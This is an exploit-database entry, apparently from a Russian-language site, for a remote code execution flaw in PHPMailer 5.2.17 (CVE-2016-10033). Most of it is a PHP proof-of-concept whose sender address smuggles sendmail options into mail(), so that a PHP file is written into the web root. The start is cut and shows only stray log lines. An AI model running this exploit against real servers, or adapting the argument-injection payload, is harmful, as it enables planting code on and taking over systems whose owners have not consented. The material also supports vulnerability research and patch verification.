PHPMailer 5.2.17 - Remote Code Execution

Свойства

Дата публикации:
28.12.2016
Цель:
PHPMailer 5.2.17
Тип воздействия:
Компрометация системы

Код


09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
 
 
See the full advisory URL for details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "";
 
// ------------------
 
 
// mail() param injection via the vulnerability in PHPMailer
 
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
 
$mail->SetFrom($email_from, 'Client Name');
 
$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
 
if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!\n";
}
     
 
 
?>